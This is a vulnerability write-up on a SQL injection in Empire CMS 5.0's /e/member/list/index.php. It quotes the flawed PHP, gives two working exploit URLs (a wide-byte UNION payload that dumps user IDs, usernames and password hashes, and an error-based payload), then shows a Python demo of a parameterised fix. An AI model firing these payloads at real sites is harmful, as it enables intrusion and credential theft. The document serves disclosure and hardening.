Empire CMS (帝国CMS) 5.0 "/e/member/list/index.php" file injection vulnerability

Published: 2025-04-13
Revised: 2025-04-13

Empire ECMS (帝国ECMS), file /e/member/list/index.php:

```php
if($sear)
{
    $keyboard=RepPostVar2($_GET['keyboard']);
    if($keyboard)
    {
        $add.=$where.$user_username." like '%$keyboard%'";
    }
    $search.="&sear=1&keyboard=$keyboard";
}
```

The code checks whether the `sear` parameter is present, then reads the `keyboard` parameter directly, then checks whether `keyboard` is non-empty; if it is not empty, `keyboard` is concatenated straight into the query, producing an injection vulnerability.

exp:

```
/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9'+union+select+1,1,1,concat(char(123),userid,char(95),username,char(95),password,char(125))+from+phome_enewsuser/*
```

On MySQL 5.5.40 the original exp raised an error but returned no content; the exp that succeeded in local testing:

```
/e/member/list/index.php?sear=1&totalnum=1&keyboard=%D9' AND (SELECT 7199 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(SELECT user()),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- cmqD
```
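The concatenated LIKE clause above beside a hardened version, as an added example that is not Empire CMS code. It uses Python's built-in sqlite3 with a constructed `enewsuser` table standing in for the real one (the table, its rows and the `search_members_*` function names are assumptions); the safe variant escapes the LIKE wildcards and binds the search term as a parameter, so the keyword is matched literally whatever characters it contains, while the vulnerable variant reproduces the page's string-splicing pattern for comparison.

```python
import sqlite3

# Constructed demo rows standing in for phome_enewsuser; values are made up.
DEMO_ROWS = [
    (1, "admin", "hash1"),
    (2, "bob", "hash2"),
    (3, "50%off", "hash3"),
]


def make_demo_db():
    """Create an in-memory SQLite database with a constructed enewsuser table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE enewsuser (userid INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO enewsuser VALUES (?, ?, ?)", DEMO_ROWS)
    return conn


def build_vulnerable_clause(keyboard):
    """Mirror the page's pattern: the search term is spliced into the SQL text."""
    return "username like '%" + keyboard + "%'"


def search_members_vulnerable(conn, keyboard):
    """Run the concatenated clause: a quote inside keyboard closes the string
    literal and the remainder is parsed as SQL, as in the vulnerable index.php."""
    sql = ("SELECT userid, username FROM enewsuser WHERE "
           + build_vulnerable_clause(keyboard) + " ORDER BY userid")
    return conn.execute(sql).fetchall()


def escape_like(term, esc="\\"):
    """Escape the LIKE metacharacters so the term is matched literally."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def search_members_safe(conn, keyboard):
    """Hardened version: wildcard escaping plus a bound parameter. The term never
    becomes part of the SQL text, so quotes and keywords inside it are inert."""
    pattern = "%" + escape_like(keyboard) + "%"
    sql = ("SELECT userid, username FROM enewsuser "
           "WHERE username LIKE ? ESCAPE '\\' ORDER BY userid")
    return conn.execute(sql, (pattern,)).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    tautology = "' or 'a'='a"
    print("vulnerable:", search_members_vulnerable(db, tautology))  # every row
    print("safe      :", search_members_safe(db, tautology))        # no rows
    print("literal % :", search_members_safe(db, "%"))              # only 50%off
```

The same principle applies in the PHP original: pass the term through a prepared statement (mysqli or PDO bound parameter) with the connection charset declared explicitly, rather than relying on a sanitising helper and string interpolation inside the `like '%...%'` literal.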
